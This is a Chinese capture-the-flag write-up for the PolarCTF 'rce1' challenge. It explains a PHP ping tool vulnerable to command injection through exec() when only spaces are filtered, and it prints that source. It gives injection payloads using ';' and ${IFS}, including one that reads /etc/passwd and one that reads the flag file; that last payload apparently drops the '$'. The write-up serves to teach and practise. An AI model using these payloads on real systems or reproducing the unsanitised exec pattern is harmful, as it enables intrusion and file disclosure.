polarctf-web-[rce1]

考点:

(1)RCE(exec函数)

(2)空格绕过

(3)执行函数(exec函数)

(4)闭合(ping命令闭合)

题目来源:Polarctf-web-[rce1]

解题:

这段代码实现了一个简单的 Ping 测试工具,用户可以通过表单提交一个 IP 地址,服务器会执行 ping 命令并返回结果。

  1. 命令注入漏洞 (高危)
  • 漏洞位置 : $cmd = "ping -c 4 {$ip}";exec($cmd, $res);

  • 问题描述: 代码仅过滤了空格字符,攻击者可以使用以下方式绕过:

    • 使用制表符 %09 代替空格

    • 使用 ${IFS} (Bash 内部字段分隔符)代替空格(本题使用这个)

    • 使用重定向符号 <> 不需要空格

    • 使用 ;&&|| 等命令连接符

  • 攻击示例:

    php 复制代码
     127.0.0.1;cat${IFS}/etc/passwd
     127.0.0.1%0als${IFS}-l
  1. 输入验证不足 (中危)
  • 问题描述: 仅检查了是否包含空格,没有进行有效的 IP 地址格式验证
php 复制代码
 <?php
 ​
 $res = FALSE;
 ​
 if (isset($_GET['ip']) && $_GET['ip']) {
     $ip = $_GET['ip'];
     $m = [];
     if (!preg_match_all("/ /", $ip, $m)) {  # 检测ip是否含有空格,如果不含有则进入里层,m用于存储匹配的数组
         $cmd = "ping -c 4 {$ip}";
         exec($cmd, $res);   # 执行cmd命令,res用于存储命令的每一行输出
     } else {
         $res = $m;
     }
 }
 ?>
 ​
 <!DOCTYPE html>
 <html>
 <head>
     <meta charset="utf-8">
     <title>ping</title>
 </head>
 <body>
 <style>
     html{
         height:100%;
     }
     body{
         padding: 0;
         margin: 0;
         background: url(1.png);
         background-size: 100% 100%;
         position: absolute;
     }
     
 </style>
 ​
 <h1>就过滤了个空格,能拿到flag算我输</h1>
 ​
 <form action="#" method="GET">
     <label for="ip">IP : </label><br>
     <input type="text" id="ip" name="ip">
     <input type="submit" value="Ping">
 </form>
 ​
 <hr>
 ​
 <pre>
 <?php
 if ($res) {
     print_r($res);
 }
 ?>
 </pre>
 ​
 <?php
 show_source(__FILE__);
 ?>
 ​
 </body>
 </html>

用分号闭合ping命令,输入ls,点击"Ping"查看当前目录文件

使用命令查看可疑文件,由于过滤了空格,此处使用{IFS}进行绕过:`;cat{IFS}fllllaaag.php`

点击"Ping"

成功回显,查看源码获得flag

相关推荐
路溪非溪2 小时前
Linux定时器和时间管理源码相关总结
linux
蝸牛ちゃん2 小时前
万字深度详解DHCP服务:动态IP地址分配的自动化引擎
网络·网络协议·tcp/ip·系统架构·自动化·软考高级·dhcp
云手机掌柜4 小时前
从0到500账号管理:亚矩阵云手机多开组队与虚拟定位实战指南
数据结构·线性代数·网络安全·容器·智能手机·矩阵·云计算
一只小bit8 小时前
Linux网络:阿里云轻量级应用服务器配置防火墙模板开放端口
linux·网络·阿里云
嘉琪0018 小时前
实现视频实时马赛克
linux·前端·javascript
帽儿山的枪手9 小时前
HVV期间,如何使用SSH隧道绕过内外网隔离限制?
linux·网络协议·安全
上海云盾商务经理杨杨9 小时前
2025数字藏品安全保卫战:高防CDN如何成为NFT应用的“隐形护甲”?
安全·网络安全
charlie11451419110 小时前
设计自己的小传输协议 导论与概念
c++·笔记·qt·网络协议·设计·通信协议
邹诗钰-电子信息工程10 小时前
嵌入式基础知识复习(C语言)
linux·c语言·vim
瀚高PG实验室11 小时前
CentOS 8 安装HGDB V4.5 psql命令执行报错
linux·运维·centos·瀚高数据库